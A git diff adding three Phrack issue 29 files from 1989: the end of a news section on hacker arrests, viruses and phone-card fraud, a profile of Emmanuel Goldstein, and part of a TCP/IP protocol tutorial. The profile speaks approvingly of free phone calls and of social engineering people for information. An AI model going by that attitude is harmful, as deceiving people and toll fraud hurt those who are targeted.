+There were a few other interesting "tid bits" of information scattered
+throughout the four loose pages including the new TAP logo (that was made to
+resemble CompuTel) and other pictures.
+
+The staff at TAP also included a postcard that contained a reader's survey.  It
+asked all sorts of questions about how the reader liked certain aspects of the
+publication... I found the idea to be potentially productive in improving the
+quality of the newsletter all around.
+
+The cost of TAP is rather cheap... it is free.  For an issue send a self
+addressed stamped envelope to:
+
+                                    T.A.P.
+                                P.O. Box 20264
+                       Louisville, Kentucky  40220-0264
+
+
+:Knight Lightning
+_______________________________________________________________________________
+
+Phrack World News QuickNotes
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+1.  911 Improvement Surcharge in Chicago (October 16, 1989) -- Monday morning,
+    October 16, Chicago Mayor Richard M. Daley announced that he would submit
+    to the city council a plan to increase city telephone taxes by 95 cents per
+    line per month, earmarked for improvements to 911 service.  Currently there
+    is no such flat charge, simply a percentage tax rate on local telephone
+    service.
+
+    Daley's spokespeople commented that 911 service here has been a mess for
+    years, and that many of the suburbs charge $1.00 per line per month, so 95
+    cents should not be unreasonable.  There were no details about what is
+    currently wrong or about what specific improvements Daley has in mind.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+2.  Hacker Caught by Caller-ID (October 9, 1989) -- MIS Week reported the
+    apprehension of a 15-year old hacker who used his Amiga personal computer
+    to tap into two minicomputers at Grumman.  The youngster was from
+    Levittown, Long Island and stumbled into the computer by using a random
+    dialing device attached to his computer.  Grumman security was able to
+    detect the intrusions, and the computer's recording of the boy's telephone
+    number led police to his home.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+3.  14-Year-Old Cracks TRW Credit For Major Fraud (October 18, 1989) -- A
+    14-year-old Fresno, California boy obtained secret "access codes" to the
+    files of TRW Credit from a bboard and used them to pose as a company or
+    employer seeking a credit history on an individual whose name he picked
+    randomly from the phone book.  From the histories, he obtained credit card
+    numbers which he then used to charge at least $11,000 in mail-order
+    merchandise (shipped to a rented storeroom) and make false applications for
+    additional cards.  He also shared his findings on computer bulletin boards.
+
+    Police began investigating when TRW noticed an unusual number of credit
+    check requests coming from a single source, later found to be the youth's
+    home telephone number.  The high school freshman, whose name was not
+    released, was arrested at his home last week and later released to his
+    parents.  His computer was confiscated and he faces felony charges that
+    amount to theft through the fraudulent use of a computer.
+
+    "Here is a 14-year-old boy with a $200 computer in his bedroom and now he
+    has shared his data with countless other hackers all over the nation," said
+    Fresno Detective Frank Clark, who investigated the case.  "The potential
+    (for abuse of the information) is incredible."  Excerpts provided by
+    Jennifer Warren (Los Angeles Times)
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+4.  Computer Virus Countermeasures Article (October 25, 1989) -- Readers of
+    Phrack Inc. might be interested in an interesting article in the October
+    1989 issue of DEFENSE ELECTRONICS, page 75, entitled "Computer Virus
+    Countermeasures -- A New Type Of Electronic Warfare," by Dr. Myron L.
+    Cramer and Stephen R. Pratt.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+5.  Computer Viruses Attack China (November 6, 1989) -- The Ministry of Public
+    Safety of People's Republic of China found this summer that one tenth of
+    the computers in China had been contaminated by three types of computer
+    virus:  "Small Ball," "Marijuana," and "Shell."  The most serious damage
+    was found in the National Statistical System, in which "Small Ball" spread
+    in 21 provinces.  In Wuhan University, viruses were found in *ALL* personal
+    computers.
+
+    In China, three hundred thousand computers (including personal computers)
+    are in operation.  Due to a premature law system the reproduction of
+    software is not regulated, so that computer viruses can easily be
+    propagated.  Ministry of Public Safety now provides "vaccines" against
+    them.  Fortunately, those viruses did not give fatal damage to data.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+6.  More Phone-Card Fraud (October 31, 1989) -- Two men were convicted by Tokyo
+    District Court on Monday, October 30, for tampering with Nippon Telephone
+    and Telegraph calling cards to increase the number of calls they could
+    make.  The court ruled that they violated the Securities Transaction Law.
+
+    One man, Kawai, was sentenced to 30 months in prison, and another, Sakaki,
+    was given an 18-month suspended sentence.
+
+    Two presiding judges ruled that using falsified telephone cards in pay
+    phones is tantamount to using securities.
+
+    However, another judge ruled in a separate case last September that
+    tampering with a telephone card does not constitute use of a security, so
+    legal observers say it will be up to the Supreme Court.
+
+    According to this most recent s ruling, Kawai changed about 1,600 telephone
+    cards, each good for 500-yen worth of telephone calls, into cards worth
+    20,000 yen.  He sold the altered cards to acquaintances for as much as
+    3,500 yen.
+
+    Sakaki also sold about 320 tampered cards for about 2 million yen.
+
+    One of the presiding judges ruled that using tampered telephone cards on
+    public telephones is the same as misleading Nippon Telegraph and
+    Telephone Corporation into believing the cards -- false securities -- were
+    genuine.  Taken from The Japan Times
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+7.  Computer Virus Hits Japanese Quake Data (October 30, 1989) -- Tokyo; A
+    computer virus has destroyed information at the University of Tokyo's
+    seismological and ocean research institutes, a university official and
+    local reports said yesterday.
+
+    An official of the university's Ocean Reasearch Institute said the virus
+    was detected earlier this month in five of the center's 100 computers,
+    but was believed to have first infected the computers in September.
+
+    The virus was found only in personal computers being used by researchers
+    and not major computer systems, the official said, requesting anonymity.
+    He said the damage was not serious.
+
+    He declined to discuss further details, but a report by the Japan
+    Broadcasting Corporation said a virus had also been found in the computers
+    at the university's Earthquake Research Institute.  Thanks to Associated
+    Press news services.  (Related article follows)
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+8.  First Virus Attack On Macintoshes In Japan (November 7, 1989) -- Six Macs
+    in University of Tokyo, Japan, were found to have caught viruses.  Since
+    Since this September, Professor K. Tamaki, Ocean Research Institute,
+    University of Tokyo, has noticed malfunctions on the screen.  In October,
+    he applied vaccines "Interferon" and "Virus Clinic" to find his four
+    Macintoshes were contaminated by computer viruses, "N Virus" type A and
+    type B.  He then found ten softwares were also infected by viruses.  A
+    Macintosh of J. Kasahara, Earthquake Research Institute, University of
+    Tokyo, was also found to be contaminated by N Virus and Score Virus.  These
+    are the first reports of real viruses in Japan.
+
+    Later it was reported that four Macintoshes in Geological Survey of Japan,
+    in Tsukuba, were infected by N Virus Type A.  This virus was sent from
+    United States together with an editor.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+9.  Hackers Can Tap Into Free Trip (October 1989) -- Attention Hackers:  Here
+    is your chance to break into a computer system and walk away with a grand
+    prize.  The "hacker challenge" dares any hacker to retrieve a secret
+    message stored in a KPMG Peat Marwick computer in Atlanta.
+
+    This challenge is being sponsored by LeeMah DataCom Security Corporation, a
+    Hayward, California, consulting firm that helps companies boost computer
+    security.  The winner gets an all-expense paid trip for two to either
+    Tahiti or St. Moritz, Switzerland.
+
+    Hackers with modems must dial 1-404-827-9584.  Then they must type this
+    password: 5336241.
+
+    From there, the hacker is on his own to figure out the various access codes
+    and commands needed to retrieve the secret message.
+
+    The winner was announced October 24, 1989 at the Federal Computer Show in
+    Washington.  Taken from USA Today.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+10.  Groaning Phone Network Survives Millions Of Calls (October 18, 1989) --
+     The nation's telecommunications network was flooded Tuesday (October 17)
+     night by an estimated 20 million attempted telephone calls from people
+     around the nation concerned about friends and family after the earthquake
+     in the bay area.
+
+     Except for brief failures, the system did not break down under the record
+     load in the areas damaged by the earthquake.
+
+     AT&T officials said that as many as 140 million long-distance phone calls
+     were placed Wednesday (October 18), the highest number for a single day in
+     history.  Excerpts thanks to John Markoff (New York Times)
+
+                        >--------=====END=====--------<
+
diff --git a/phrack29/2.txt b/phrack29/2.txt
new file mode 100644
index 0000000..87d44cf
--- /dev/null
+++ b/phrack29/2.txt
@@ -0,0 +1,257 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 29, File #2 of 12
+
+                           ==Phrack Pro-Phile XXIX==
+
+                      Created and Presented by Taran King
+
+                           Done on November 12, 1989
+
+        Welcome to Phrack Pro-Phile XXIX.  Phrack Pro-Phile was created to
+bring information to you, the community, about retired or highly important/
+controversial people.  This edition of the Phrack Pro-Phile starts a different
+format as I'm sure you will notice.  The skeleton of the Pro-Phile is a form
+in which the people fill in the blanks.  Starting now, using their words (and a
+little editing), the Pro-Phile will be presented in first person format.  This
+month, we present to you the editor of one of the most prominent printed
+phreak/hack newsletters of all times...
+
+                              Emmanuel Goldstein
+                              ~~~~~~~~~~~~~~~~~~
+
+           Handle:  Emmanuel Goldstein
+         Call Him:  Call me anything.  Just look me in the eye.
+     Past Handles:  Howard Tripod, Sidney Schreiber, Bob Hardy, Gary Wilson,
+                    Clint Eastwood, 110.  There are others that I keep quiet
+                    about.
+    Handle Origin:  I prefer using regular names rather than descriptive
+                    boastful titles (i.e., "The Hacker King," who,
+                    incidentally, I don't wish to offend if he/she even exists;
+                    this is just an example).  The names I use are either
+                    people I've "become" or names that bestow a certain image.
+                    Emmanuel Goldstein, for instance, led the resistance in
+                    "1984."  But then, there was talk that he never really
+                    existed and was just created by the government in order to
+                    capture the real subversives.  I don't think that's the
+                    case with me.
+        Computers:  I use PC compatibles for the most part.  I also play around
+                    with Macs but they're not REAL computers to me.  My
+                    favorite machine of all time is the Zenith Z-100, a
+                    dual-processor computer that can emulate an old fashioned
+                    H8 or an IBM PC.  It runs lots of operating systems and has
+                    a great keyboard.  Too bad it was discontinued four years
+                    ago....
+Sysop/Co-Sysop Of:  The old Plovernet on Long Island (1984), Private Sector in
+                    New Jersey (1985, 1986), and the present and future 2600
+                    boards.
+
+Origins in Phreak/Hack World
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+I've been playing with phones all of my life and I started playing with
+computers the first time I saw one.  I always seemed to get in trouble for
+doing things I wasn't supposed to... crashing the PDP-10 in high school...
+flashing the switchhook on my phone 95 times and getting an angry switchman who
+wouldn't release the line, claiming I broke it (I was 10).  As computers and
+phones started to become integrated, I realized what hacking really was -- just
+asking a lot of questions and being really persistent.  A lot of people don't
+like that, whether it's computers or real life, but how else are you going to
+learn what's REALLY happening and not just what others WANT you to know?
+
+Origins in Phreak/Hack BBSes
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+I don't really have a BBS reputation to speak of.  They tend to disappear
+rather quickly and that tends to dampen my enthusiasm towards them quite a bit,
+but I do want to see more and more of them come up and begin to reach out and
+be creative.  They also have to challenge the system some more.  2600 has a
+very strong opinion on BBS privacy, namely that the same rights afforded to any
+publication should be extended to a bulletin board, but every BBS owner should
+know the importance of this and should be willing to fight for it.  If you
+didn't believe in preserving the First Amendment, you probably wouldn't go out
+and buy a newspaper, would you?  A BBS is the same thing and anyone who runs a
+system should see this connection.  Hackers tend to bring this issue to the
+forefront a bit more, but this is something that applies to all bulletin
+boards.
+
+Encounters With Phreakers and Hackers
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Meeting Captain Crunch in Amsterdam this past summer was a real trip.  Finding
+out who Cable Pair really was certainly resulted in some highlights.  I've met
+a lot of "famous" phreaks and hackers and now I know a lot of foreign ones, but
+I'm always amazed at the number of people I meet (mostly in New York) who say
+they've been hacking since the sixties.  There's an awful lot of people out
+there who are into this kind of stuff, which is something I never knew before I
+started being open about these particular interests.
+
+Experience Gained In The Following Ways
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Social engineering, of course.  I like hacking computers when I'm not feeling
+social because you don't have to adjust your attitude to get a reply, but
+people hacking is so much more satisfying.  No matter how many security codes
+and precautions are taken, as long as one person without knowledge is able to
+talk to another with knowledge, it will always be possible to get things out of
+them.  Most of the really important bits of information I've been able to get
+are through people, not computers.
+
+Knowledge Attributed To...
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+Ignorance.  I built up my knowledge by wandering around in places others
+thought unimportant.  Hacking can be like trashing.  It looks like garbage or a
+waste of time to most, but if you keep your mind open, you can learn a lot.  If
+more people felt this way, hackers would stand out less because everyone would
+be a bit more adventurous, but ignorance prevails and we learn what nobody else
+cares about...that is until it affects them.
+
+Work/Schooling
+~~~~~~~~~~~~~~
+I got an English degree at Stony Brook (it's currently gathering dust in a
+closet).  I should note that I've never taken a computer course, nor do I
+intend to.  I've worked as a limo driver, a Good Humor man, and a typesetter,
+and more recently, as a freelance writer, a reporter for Pacifica Radio, and a
+radio engineer/producer and talk show host.
+
+Busted For...
+~~~~~~~~~~~~~
+I used to make free phone calls all the time.  Now, obviously, I can't do that,
+since I'm in the public eye, but that's not a drawback to me because I can
+still experiment all I want.  Nothing can change that.  For the most part I was
+careful while I was doing these things, but there was one time when my luck ran
+out.  I had been using Telemail to communicate with some other people and they,
+unknown to us, had been looking for hackers on their system.  They found us,
+the members of PHALSE (Phreakers, Hackers, and Laundromat Service Employees
+[I'm told the feds spent a lot of time investigating the laundry connection,
+even though we only used it to spell out the word PHALSE!]).  I believe four
+people got indicted in that adventure.  I was one of them.  Bill Landreth was
+another.  They thought I was the ringleader so they gave me a 10 count
+indictment, more than twice what anyone else got.  Without hiring an expensive
+lawyer, I talked to a roomful of feds about the system and what was wrong with
+it.  I made it clear that I wasn't turning anybody in -- even if I wanted to I
+still didn't know who or where they were.  I think I was dealt with fairly.  I
+told them what I did and paid for the time I used.  Nothing more.  That was in
+1984 when 2600 was just getting off the ground.  A couple of years ago, one of
+the feds who had questioned me tried to get me to work for them.  Not to entrap
+hackers, but Soviet spies.  And so it goes.
+
+Interests
+~~~~~~~~~
+I guess I'm an explorer because everything I like doing involves exploration of
+some sort.  Obviously, hacking contains a good amount of that.  I like
+traveling quite a bit, particularly when I'm free to do whatever the hell I
+want.  Traveling with people is fun but it can also be a drag because something
+you want to do puts them off and then you either wind up not doing it or doing
+it and pissing them off.  I like to ride subways to weird places and walk
+through bad neighborhoods.  It's all a part of exploring and seeing the world
+through different eyes.  A couple of years ago I went to Baffin Island and hung
+out for a week with Eskimos.  Everyone thought I was crazy but I had a great
+time.  I'm also into astronomy, but not the classroom kind.  I took a course
+in astronomy once and it was the biggest mistake of my life.  All we did was
+talk about equations.  I like to look at the sky and read about what's being
+discovered up there.  When the space telescope goes up next year, interest in
+space will rise again.  Then there's free-lance writing, which I have to devote
+more time to.  I'm working on a couple of plays, some short stories, a
+screenplay for a movie, and a screenplay for TV.  I'll probably focus on the
+plays only because there's so much bullshit involved in TV and movies.  And
+finally, there's radio.  I've been in radio for just over 10 years, doing
+whatever comes to mind on WUSB-FM in Stony Brook, NY, a small, noncommercial
+radio station at the State University.  Now I also work at WBAI-FM, a much
+larger station in New York City with the same kind of free-form attitude.
+There's so much you can do with radio, but so few stations want to take a
+chance any more.  That's why they all sound the same.  Unfortunately, when you
+sell commercials, you also sell your freedom.  I've seen it enough times to
+know it's true and that's the reason I've stayed out of commercial radio.
+Right now I do a weekly talk show on WUSB called "Brain Damage" where I take
+calls, play with the phones, and air tapes from Radio Moscow.  On WBAI I'm
+doing two shows:  "News of the World" which is a compilation of foreign news
+reports and "Off The Hook," a program about, you guessed it, phone phreaks.
+
+Favorite Things
+~~~~~~~~~~~~~~~
+I like hanging out with fun people who are open-minded, non-judgmental, and
+preferably insane to a degree.  I enjoy talking on the phone with friends and
+strangers alike.  Strangers are different because you can be whoever you want
+to be with them.  They tend to believe almost anything you say.  Music is
+really important.  Right now I like rappers and toasters the most, with soca
+and hardcore close behind.  Ska's real good too, but there's not much coming
+out.  The record I put on when I wake up sets my mood for the day.  I like
+music with lyrics that mean something.  There's a time and a place for mindless
+droning but there's too much of it around.  Music should have meaning.  In
+Jamaica, people don't buy newspapers.  They buy records and that's how they
+learn what's going on and what the latest catch phrases are.  Some of my
+favorite rock bands include The Clash, Big Audio Dynamite, Dead Kennedys,
+Donner Party, Public Enemy, Camper Van Beethoven, Pink Floyd, Fun Boy Three, De
+La Soul, and Anti-Nowhere League.  Some of my favorite solo artists are Tracy
+Chapman, John Lennon, Elvis Costello, and Patsy Cline.  I realize I'm very
+lucky because I work in an environment (noncommercial radio station) that gets
+over 100 new albums a week.  I don't know how I would have ever found some of
+the stuff I like if I didn't have that kind of access.
+
+Inside Jokes
+~~~~~~~~~~~~
+ "OK, if we can't have a tour, can we at least have a look around?"
+
+ "I'm not allowed to talk to you any more."
+
+ "This is the Sprint operator.  I have a collect call from AT&T."
+
+ "There aren't any more supervisors, sir.  You've spoken to all of them."
+
+ "Iran, will you hang up!  Sir, do you speak what he speaks?"
+
+ "I said, DON'T hit return!"
+
+ "But we didn't know it was the foreign minister!"
+
+ "Repair serv-- damn!  There it goes again.  What the hell's wrong with
+   these phones?"
+
+ "Just tell me how much money you lost and I'll arrange for a trial date."
+
+Serious Section
+~~~~~~~~~~~~~~~
+Being a part of the hack/phreak community, you get to experience unique little
+adventures that the "average" person has no conception of.  We talk to people
+over the phone and have no idea what they look like, often no idea what they
+even sound like (BBSes).  We play with technology and are thought of as
+geniuses merely because the rest of the world doesn't understand what we're
+doing.  I think that goes to our heads sometimes, which is bad for everyone.
+We should apply our knowledge and skills not only to help ourselves by getting
+a high-paying job somewhere but to help others as well.  Look what happened in
+China.  Using FAX machines, modems, and redial functions, people forced
+information into the country and tied up the government's snitch lines which
+probably saved a few lives.  The "average" person would never think of applying
+technology in this way, but we do and we know how to do it efficiently,
+quickly, and without spending money.  It's because of that last one that we've
+got freedom.  Most people don't do things because of the cost.  Without having
+to worry about that, you can be a lot more imaginative.  Of course, that also
+makes it illegal, which is enough to stifle some of us.  What we do and how we
+do it is a decision we each have to make, but we should stop wasting time
+boasting and get on with the exploring and the learning and the new
+applications.  Another thing that really gets me is the person who says,
+"hacking and phreaking isn't what it used to be."  First off, if nothing
+changes, life gets pretty dull.  Second, that statement is usually a precursor
+to something like, "what kids do today isn't real hacking.  What I did 5, 10,
+20 years ago was REAL hacking."  Generalizations like that are worthless.  It's
+just like yuppies going on about the Beatles, calling that real music, and
+saying the sounds of today are crap (by the way, I like the Beatles a lot).  At
+the same time, too many hackers are just starting out and thinking they know it
+all, dismissing everything that happened before they were around.  The spirit
+of today's hacker is often the same as that of a phone phreak of the sixties.
+And there were people like us around 100 years ago but we're even more far
+removed from what they could have possibly been doing.  The point is that
+there's a bond that ties a lot of us together -- it cuts through time and
+backgrounds.  Like anything else, there's too much hypocrisy and judging going
+on in the hack/phreak world.  I think it's a real waste of time.
+
+Are Phreaks/Hackers You've Met Generally Computer Geeks?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Not in the least.  Those people that I've come to know have turned out to be
+just about everything you can imagine.  White/Black, Jew/Gentile, straight/gay,
+male/female, opened/closed, you name it.  Everyone's got different sides to
+them, stuff they don't always want others to know.  Sometimes we try to squash
+those other sides of us, but they still exist.  I've met hackers who have
+geekish qualities but once you get to know them, you realize there's more to
+them.  Of course, there are lots of hackers I would never want to know in a
+million years; that's just the way I am with a lot of people.  I think it was
+Linus Van Pelt who said, "I love mankind.  It's people I can't stand."
+
+                        >--------=====END=====--------<
diff --git a/phrack29/3.txt b/phrack29/3.txt
new file mode 100644
index 0000000..434d882
--- /dev/null
+++ b/phrack29/3.txt
@@ -0,0 +1,709 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 29, File #3 of 12
+
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+       <>                                                            <>
+       <>           Introduction to the Internet Protocols           <>
+       <>           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~           <>
+       <>        Chapter Nine Of The Future Transcendent Saga        <>
+       <>                                                            <>
+       <>                    Part Two of Two Files                   <>
+       <>                                                            <>
+       <>                Presented by Knight Lightning               <>
+       <>                     September 27, 1989                     <>
+       <>                                                            <>
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+
+Prologue - Part Two
+~~~~~~~~
+A great deal of the material in this file comes from "Introduction to the
+Internet Protocols" by Charles L. Hedrick of Rutgers University.  That material
+is copyrighted and is used in this file by permission.  Time differention and
+changes in the wide area networks have made it neccessary for some details of
+the file to updated and in some cases reworded for better understanding by our
+readers.  Also, Unix is a trademark of AT&T Technologies, Inc. -- Again, just
+thought I'd let you know.
+
+Table of Contents - Part Two
+~~~~~~~~~~~~~~~~~
+*  Introduction - Part Two
+*  Well Known Sockets And The Applications Layer
+*  Protocols Other Than TCP:  UDP and ICMP
+*  Keeping Track Of Names And Information:  The Domain System
+*  Routing
+*  Details About The Internet Addresses:  Subnets And Broadcasting
+*  Datagram Fragmentation And Reassembly
+*  Ethernet Encapsulation:  ARP
+*  Getting More Information
+
+
+Introduction - Part Two
+~~~~~~~~~~~~
+This article is a brief introduction to TCP/IP, followed by suggestions on
+what to read for more information.  This is not intended to be a complete
+description, but it can give you a reasonable idea of the capabilities of the
+protocols.  However, if you need to know any details of the technology, you
+will want to read the standards yourself.
+
+Throughout this file, you will find references to the standards, in the form of
+"RFC" (Request For Comments) or "IEN" (Internet Engineering Notes) numbers --
+these are document numbers.  The final section (Getting More Information)
+explains how you can get copies of those standards.
+
+
+Well-Known Sockets And The Applications Layer
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+In part one of this series, I described how a stream of data is broken up into
+datagrams, sent to another computer, and put back together.  However something
+more is needed in order to accomplish anything useful.  There has to be a way
+for you to open a connection to a specified computer, log into it, tell it what
+file you want, and control the transmission of the file.  (If you have a
+different application in mind, e.g. computer mail, some analogous protocol is
+needed.)  This is done by "application protocols."  The application protocols
+run "on top" of TCP/IP.  That is, when they want to send a message, they give
+the message to TCP.  TCP makes sure it gets delivered to the other end.
+Because TCP and IP take care of all the networking details, the applications
+protocols can treat a network connection as if it were a simple byte stream,
+like a terminal or phone line.
+
+Before going into more details about applications programs, we have to describe
+how you find an application.  Suppose you want to send a file to a computer
+whose Internet address is 128.6.4.7.  To start the process, you need more than
+just the Internet address.  You have to connect to the FTP server at the other
+end.  In general, network programs are specialized for a specific set of tasks.
+Most systems have separate programs to handle file transfers, remote terminal
+logins, mail, etc.  When you connect to 128.6.4.7, you have to specify that you
+want to talk to the FTP server.  This is done by having "well-known sockets"
+for each server.  Recall that TCP uses port numbers to keep track of individual
+conversations.  User programs normally use more or less random port numbers.
+However specific port numbers are assigned to the programs that sit waiting for
+requests.  For example, if you want to send a file, you will start a program
+called "ftp."  It will open a connection using some random number, say 1234,
+for the port number on its end.  However it will specify port number 21 for the
+other end.  This is the official port number for the FTP server.  Note that
+there are two different programs involved.  You run ftp on your side.  This is
+a program designed to accept commands from your terminal and pass them on to
+the other end.  The program that you talk to on the other machine is the FTP
+server.  It is designed to accept commands from the network connection, rather
+than an interactive terminal.  There is no need for your program to use a
+well-known socket number for itself.  Nobody is trying to find it.  However the
+servers have to have well-known numbers, so that people can open connections to
+them and start sending them commands.  The official port numbers for each
+program are given in "Assigned Numbers."
+
+Note that a connection is actually described by a set of 4 numbers:  The
+Internet address at each end, and the TCP port number at each end.  Every
+datagram has all four of those numbers in it.  (The Internet addresses are in
+the IP header, and the TCP port numbers are in the TCP header.)  In order to
+keep things straight, no two connections can have the same set of numbers.
+However it is enough for any one number to be different.  For example, it is
+perfectly possible for two different users on a machine to be sending files to
+the same other machine.  This could result in connections with the following
+parameters:
+
+                     Internet addresses         TCP ports
+      connection 1  128.6.4.194, 128.6.4.7      1234, 21
+      connection 2  128.6.4.194, 128.6.4.7      1235, 21
+
+Since the same machines are involved, the Internet addresses are the same.
+Since they are both doing file transfers, one end of the connection involves
+the well-known port number for FTP.  The only thing that differs is the port
+number for the program that the users are running.  That's enough of a
+difference.  Generally, at least one end of the connection asks the network
+software to assign it a port number that is guaranteed to be unique.  Normally,
+it's the user's end, since the server has to use a well-known number.
+
+Now that we know how to open connections, let's get back to the applications
+programs.  As mentioned earlier, once TCP has opened a connection, we have
+something that might as well be a simple wire.  All the hard parts are handled
+by TCP and IP.  However we still need some agreement as to what we send over
+this connection.  In effect this is simply an agreement on what set of commands
+the application will understand, and the format in which they are to be sent.
+Generally, what is sent is a combination of commands and data.  They use
+context to differentiate.  For example, the mail protocol works like this:
+Your mail program opens a connection to the mail server at the other end.  Your
+program gives it your machine's name, the sender of the message, and the
+recipients you want it sent to.  It then sends a command saying that it is
+starting the message.  At that point, the other end stops treating what it sees
+as commands, and starts accepting the message.  Your end then starts sending
+the text of the message.  At the end of the message, a special mark is sent (a
+dot in the first column).  After that, both ends understand that your program
+is again sending commands.  This is the simplest way to do things, and the one
+that most applications use.
+
+File transfer is somewhat more complex.  The file transfer protocol involves
+two different connections.  It starts out just like mail.  The user's program
+sends commands like "log me in as this user," "here is my password," "send me
+the file with this name."  However once the command to send data is sent, a
+second connection is opened for the data itself.  It would certainly be
+possible to send the data on the same connection, as mail does.  However file
+transfers often take a long time.  The designers of the file transfer protocol
+wanted to allow the user to continue issuing commands while the transfer is
+going on.  For example, the user might make an inquiry, or he might abort the
+transfer.  Thus the designers felt it was best to use a separate connection for
+the data and leave the original command connection for commands.  (It is also
+possible to open command connections to two different computers, and tell them
+to send a file from one to the other.  In that case, the data couldn't go over
+the command connection.)
+
+Remote terminal connections use another mechanism still.  For remote logins,
+there is just one connection.  It normally sends data.  When it is necessary to
+send a command (e.g. to set the terminal type or to change some mode), a
+special character is used to indicate that the next character is a command.  If
+the user happens to type that special character as data, two of them are sent.
+
+I am not going to describe the application protocols in detail in this file.
+It is better to read the RFCs yourself.  However there are a couple of common
+conventions used by applications that will be described here.  First, the
+common network representation:  TCP/IP is intended to be usable on any
+computer.  Unfortunately, not all computers agree on how data is represented.
+
+There are differences in character codes (ASCII vs. EBCDIC), in end of line
+conventions (carriage return, line feed, or a representation using counts), and
+in whether terminals expect characters to be sent individually or a line at a
+time.  In order to allow computers of different kinds to communicate, each
+applications protocol defines a standard representation.  Note that TCP and IP
+do not care about the representation.  TCP simply sends octets.  However the
+programs at both ends have to agree on how the octets are to be interpreted.
+
+The RFC for each application specifies the standard representation for that
+application.  Normally it is "net ASCII."  This uses ASCII characters, with end
+of line denoted by a carriage return followed by a line feed.  For remote
+login, there is also a definition of a "standard terminal," which turns out to
+be a half-duplex terminal with echoing happening on the local machine.  Most
+applications also make provisions for the two computers to agree on other
+representations that they may find more convenient.  For example, PDP-10's have
+36-bit words.  There is a way that two PDP-10's can agree to send a 36-bit
+binary file.  Similarly, two systems that prefer full-duplex terminal
+conversations can agree on that.  However each application has a standard
+representation, which every machine must support.
+
+So that you might get a better idea of what is involved in the application
+protocols, here is an imaginary example of SMTP (the simple mail transfer
+protocol.)  Assume that a computer called FTS.PHRACK.EDU wants to send the
+following message.
+
+   Date: Fri, 17 Nov 89 15:42:06 EDT
+   From: knight@fts.phrack.edu
+   To: taran@msp.phrack.edu
+   Subject: Anniversary
+
+   Four years is quite a long time to be around.  Happy Anniversary!
+
+Note that the format of the message itself is described by an Internet standard
+(RFC 822).  The standard specifies the fact that the message must be
+transmitted as net ASCII (i.e. it must be ASCII, with carriage return/linefeed
+to delimit lines).  It also describes the general structure, as a group of
+header lines, then a blank line, and then the body of the message.  Finally, it
+describes the syntax of the header lines in detail.  Generally they consist of
+a keyword and then a value.
+
+Note that the addressee is indicated as TARAN@MSP.PHRACK.EDU.  Initially,
+addresses were simply "person at machine."  Today's standards are much more
+flexible.  There are now provisions for systems to handle other systems' mail.
+This can allow automatic forwarding on behalf of computers not connected to the
+Internet.  It can be used to direct mail for a number of systems to one central
+mail server.  Indeed there is no requirement that an actual computer by the
+name of FTS.PHRACK.EDU even exist (and it doesn't).  The name servers could be
+set up so that you mail to department names, and each department's mail is
+routed automatically to an appropriate computer.  It is also possible that the
+part before the @ is something other than a user name.  It is possible for
+programs to be set up to process mail.  There are also provisions to handle
+mailing lists, and generic names such as "postmaster" or "operator."
+
+The way the message is to be sent to another system is described by RFCs 821
+and 974.  The program that is going to be doing the sending asks the name
+server several queries to determine where to route the message.  The first
+query is to find out which machines handle mail for the name FTS.PHRACK.EDU.
+In this case, the server replies that FTS.PHRACK.EDU handles its own mail.  The
+program then asks for the address of FTS.PHRACK.EDU, which for the sake of this
+example is is 269.517.724.5.  Then the the mail program opens a TCP connection
+to port 25 on 269.517.724.5.  Port 25 is the well-known socket used for
+receiving mail.  Once this connection is established, the mail program starts
+sending commands.  Here is a typical conversation.  Each line is labelled as to
+whether it is from FTS or MSP.  Note that FTS initiated the connection:
+
+     MSP    220 MSP.PHRACK.EDU SMTP Service at 17 Nov 89 09:35:24 EDT
+     FTS    HELO fts.phrack.edu
+     MSP    250 MSP.PHRACK.EDU - Hello, FTS.PHRACK.EDU
+     FTS    MAIL From:<knight@fts.phrack.edu>
+     MSP    250 MAIL accepted
+     FTS    RCPT To:<taran@msp.phrack.edu>
+     MSP    250 Recipient accepted
+     FTS    DATA
+     MSP    354 Start mail input; end with <CRLF>.<CRLF>
+     FTS    Date: Fri, 17 Nov 89 15:42:06 EDT
+     FTS    From: knight@fts.phrack.edu
+     FTS    To: taran@msp.phrack.edu
+     FTS    Subject: Anniversary
+     FTS
+     FTS    Four years is quite a long time to be around.  Happy Anniversary!
+     FTS    .
+     MSP    250 OK
+     FTS    QUIT
+     MSP    221 MSP.PHRACK.EDU Service closing transmission channel
+
+The commands all use normal text.  This is typical of the Internet standards.
+Many of the protocols use standard ASCII commands.  This makes it easy to watch
+what is going on and to diagnose problems.  The mail program keeps a log of
+each conversation so if something goes wrong, the log file can simply be mailed
+to the postmaster.  Since it is normal text, he can see what was going on.  It
+also allows a human to interact directly with the mail server, for testing.
+
+The responses all begin with numbers.  This is also typical of Internet
+protocols.  The allowable responses are defined in the protocol.  The numbers
+allow the user program to respond unambiguously.  The rest of the response is
+text, which is normally for use by any human who may be watching or looking at
+a log.  It has no effect on the operation of the programs.  The commands
